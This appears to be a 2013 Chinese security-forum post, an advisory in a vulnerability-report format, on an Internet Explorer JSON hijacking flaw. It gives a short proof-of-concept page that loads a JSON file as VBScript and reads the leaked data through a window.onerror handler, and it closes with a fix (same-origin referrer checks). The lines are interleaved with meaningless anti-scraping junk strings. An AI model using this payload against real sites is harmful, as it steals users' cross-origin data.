中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
5 Y5 q4 P2 u6 V/ {% Q [$ T; A
( J% E; h% M- ]& H5 E! Q1 o- X
由于某些资源容器对数据处理不当导致json劫持漏洞.
+ K7 x8 Q7 e( u$ m* w. H2 W
详细说明:
9 `( B1 H, J% G% N$ O
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
& M% h) T% i c% E2 D" _
<script language=vbscript></script>
; ~9 ~2 e: s& z: P* H% Z" ]* G
l1 g+ ~# {( R7 a# m8 S
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
' V6 a8 T+ V& c9 @ j: {/ I) F
漏洞证明:
' h g1 v% b& L0 F) {/ [2 x4 H6 ?7 z
<script>
. }9 I$ n( V. w
window.onerror=function(_){
O+ _* C% J6 B# o8 V3 j
alert(_)
+ S+ e2 {4 ?4 a6 K
}
/ a) V0 M2 H3 `) a/ ?/ q9 L
</script>
% V, T6 V* D7 q9 g9 f1 b
<script language=vbscript src=1.json></script>
" Q7 h/ o( E8 `2 |
2 e9 `. \5 i9 A. K
7 \/ R% N9 G) E
1.json:
" Y0 `' i, |0 b
[{"name":"sogili","age":19}]
& \- k' K9 L0 e6 H
修复方案:
, N1 P* \0 E. h
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2